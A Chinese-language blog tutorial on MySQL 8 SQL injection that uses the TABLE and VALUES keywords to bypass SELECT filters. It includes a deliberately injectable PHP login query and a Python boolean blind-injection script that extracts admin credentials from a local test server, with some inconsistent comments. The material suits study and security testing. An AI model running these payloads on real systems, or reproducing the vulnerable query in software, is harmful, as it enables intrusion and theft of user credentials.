基于mysql8特性的sql注入

*严正声明：本文仅限于技术讨论与分享，严禁用于非法途径。

Mysql8.0.0版本自16年推出以后已经五年了虽然更新的比较频繁,但是较为稳定版本直到近两年正式版本发布才
逐渐引起大家的重视。官方表示mysql8.0要比mysql5.7快出两倍支持了json,nosql,还修改了默认身份验证
在MySQL8.0.19之后MySQL推出了一些新语法使我们可以利用其进行sql注入:

Table 关键字

table关键字的语法:

TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]]

其作用是直接列出表的整个内容:

VALUES

1. VALUES row_constructor_list [ORDER BY column_designator] [LIMIT BY number]
   
2. row_constructor_list:
   
3. ROW(value_list)[, ROW(value_list)][, ...]
   
4. value_list:
   
5. value[, value][, ...]
   
6. column_designator:
   
7. column_index

复制代码

VALUES关键字可直接通过给出值的方式直接组成一个表

VALUES ROW(1,2,3),ROW(1,1,1),ROW(1,2,3);

可以利用联合注入

注入思路

假设现在有一个注入的情况,过滤了select,这样无法使用子查询也无法查询到其他表:

后端的语句是这样的:

1. $username=$_POST['username'];
   
2. $password=$_POST['password'];
   
3. $sql= "select * from users where username = '${username}' and password = '${password}'";

复制代码

很明显username和password参数即为注入点,如果有回显的话可以直接使用union注入出来

但是现在很少有机会给你回显了我们也可以直接利用盲注的方法但是我们需要知道目标表的名字和字段数:

1. select * from users where username = 'aaa\' and passwo
   
2. rd = ' or (1,'a','a') <(table users limit 1 offset 1);

复制代码

这是一个布尔盲注的结构我们构造如下的结构让括号内的内容依次与users表的第一个记录进行比较

1. (1,'a','a') <(table users limit 1 offset 1);

复制代码

在Mysql语法中数字的比较我们无需多言
但是字符串的比较需要简单说一下:
在mysql中判断两个字符串大小的规则是:不区分大小写,按照0-9a-z的ascii码大小顺序进行比较 先从第一个字符
进行比较ascii值,第一个字符相同的比较第二个字符如果相同再比较下一个以此类推直到有结果;如果前面字符相
同全部相同 则以长度更长的为大:

利用括号内多个数据与table返回的表查询结果比较时 其规则是从括号内第一个参数与table查询的第一列数据进行
比较如果为真则继续比较第二个 如果为假则不比较后面的直接返回假 所以在盲注时要从第一个字段开始爆破:

要注意最后一个字段最后一个字符因为长度相等时利用比较<>符号判断相等时为假 注意要将其向前推
一个字母 最后一个字母如果是b则正确结果应该是a

下列给出一个盲注脚本:

1. #-*- coding:utf-8 -*-
   
2. #orio1e
   
3. import requests
   
4. def str2hex(str):
   
5.         result='0x'
   
6.         for i in str:
   
7.                 result+=hex(ord(i))[2:]
   
8.         return result
   
9. dic=['0','1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i',
   
10. 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
    
11.          'w', 'x', 'y', 'z',]  # 字典
    
12. result=''
    
13. for i in range(1,35):
    
14.         for j in range(len(dic)):
    
15.                 print(dic[j])
    
16.                 url="http://127.0.0.1:8010"
    
17.                 #第一个字段
    
18.                 #结果:1
    
19.                 payload={"username":"asd\","password":"||({},0x21,0x21)<(table/**/admin_user/*
    
20. */limit/**/1)#".format(str2hex(result+dic[j]))}
    
21.                 #爆第二个字段
    
22.                 #结果:guest
    
23.                 payload={"username":"asd\","password":"||(0x31,{},0x21)<(table/**/admin_u
    
24. ser/**/limit/**/1)#".format(str2hex(result+dic[j]))}
    
25.                 #爆第三个字段
    
26.                 #结果:123456
    
27.                 #因为最后一个字符完成后长度相等又判断为假 所以最后一个字符应为其下一个字母
    
28.                 #但是这仅限最后一个字段
    
29.                 #所以正确结果是we1c0mehacker
    
30.                 payload={"username":"asd\","password":"||(0x31,0x61646d696e,{})<(table
    
31. /**/users/**/limit/**/1)#".format(str2hex(result+dic[j]))}
    
32.                
    
33.                 res=requests.post(url=url,data=payload)
    
34.                 print(payload)
    
35.                 print(res.text[-20:])
    
36.                 if "emmmmm" in res.text:
    
37.                         continue
    
38.                 elif "no" in res.text:
    
39.                         #返回假时表示上一个字母即为正确结果
    
40.                         result+=dic[j-1]
    
41.                         break
    
42. 
    
43.         print(result)

复制代码